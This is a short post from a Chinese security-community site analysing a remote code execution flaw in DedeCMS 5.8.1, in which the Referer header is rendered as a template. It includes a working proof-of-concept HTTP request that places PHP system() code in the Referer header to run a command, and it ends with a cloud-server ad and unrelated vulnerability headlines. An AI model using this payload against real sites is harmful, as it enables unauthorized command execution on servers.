网安 - 专业的网络安全产业、社区、知识平台

5.8.1 RCE漏洞

VSole2021-10-05 19:21:38

漏洞分析:

在include\common.func.php文件中的ShowMsg函数存在模板注入

$gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

从Referer头中取值,然后进行渲染,造成RCE

$tpl = new DedeTemplate();
$tpl->LoadString($msg);

POC

GET /plus/flink.php?dopost=save&c=whoami HTTP/1.1
Host: 10.211.55.3
Referer: <?php "system"($c);die;/*

使用了ShowMsg函数,且参数为-1的文件,均可造成RCE

源码下载地址 下载地址:https://github.com/dedecms/DedeCMS/releases/tag/v5.8.1

参考文章:

https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html

另外推一下腾讯云的轻量云服务器

https://curl.qcloud.com/l0OukCM6 2核4G内存8M带宽74块1年,不需要新用户,只要没用过轻量服务器即可购买

漏洞
本作品采用《CC 协议》,转载必须注明作者和本文链接
漏洞修复厂商Vicarius获3000万美元B轮融资
2024-01-19 08:43:45
该公司吸引的总投资金额已超过5600万美元,新一轮融资将主要用于加速公司在全球范围内的扩张,并支持其从北美到欧洲不断增长的全球客户群,同时也将支持推进AI路线和产品技术创新。
Google Chrome WebRTC堆缓冲区溢出漏洞安全风险通告
2023-12-22 11:40:38
漏洞概述  漏洞名称Google Chrome WebRTC 堆缓冲区溢出漏洞漏洞编号QVD-2023-48180,CVE-2023-7024公开时间2023-12-20影响量级千万级奇安信评级高危CVSS 3.1分数8.8威胁类型代码执行、拒绝服务利用可能性高POC状态未公开在野利用状态已发现EXP状态未公开技术细节状态未公开利用条件:需要用户交互。01 漏洞详情影
漏洞分析 CVE-2010-0249
2023-11-25 17:50:17
漏洞分析 CVE-2010-0249
Coremail与国家信息安全漏洞库(CNNVD)达成深度合作!
2023-11-06 13:43:31
漏洞信息共享合作单位证书近日,Coremail获得由国家信息安全漏洞库(CNNVD)颁发的“CNNVD漏洞信息共享合作单位”证书。 此证书是国家权威机构对Coremail安全研究技术和漏洞挖掘技术实力的充分肯定,也是双方合作的里程碑。 国家信息安全漏洞库(CNNVD), 为负责建设运维的国家级信息安全漏洞数据管理平台, 旨在为我国信息安全保障提供服务。  “
漏洞预警 CraftCMS远程代码执行漏洞
2023-09-22 14:44:07
漏洞预警 CraftCMS远程代码执行漏洞
不是我懒,王者级漏洞真不用修!
2023-08-29 09:16:34
漏洞排查与处置,是安全管理员在安全运营中都会碰到的问题,常见却很难做好。
漏洞补丁无效!梭子鱼安全网关仍被黑客攻击
2023-08-28 16:11:13
美国联邦调查局于近日警告称,梭子鱼电子邮件安全网关(ESG)的一个重要远程命令注入漏洞的补丁 "无效",已打补丁的设备仍在不断受到攻击。
漏洞PoC框架Nuclei的图形版- Fiora
2023-08-11 14:33:54
点击上方蓝字 关注安全知识引言Fiora:漏洞PoC框架Nuclei的图形版。快捷搜索PoC、一键运行Nu
全球92万台!RouterOS漏洞曝光:设备面临大规模攻击
2023-08-03 09:38:48
Mikrotik RouterOS操作系统不支持暴力保护,默认的“admin”用户密码在2021年10月之前是空字符串。更让人震惊的是,检测CVE-2023-30799的利用“几乎不可能”,因为RouterOS web和Winbox接口实现了自定义加密,而威胁检测系统Snort和Suricata无法解密和检查这些加密。
VSole
网络安全专家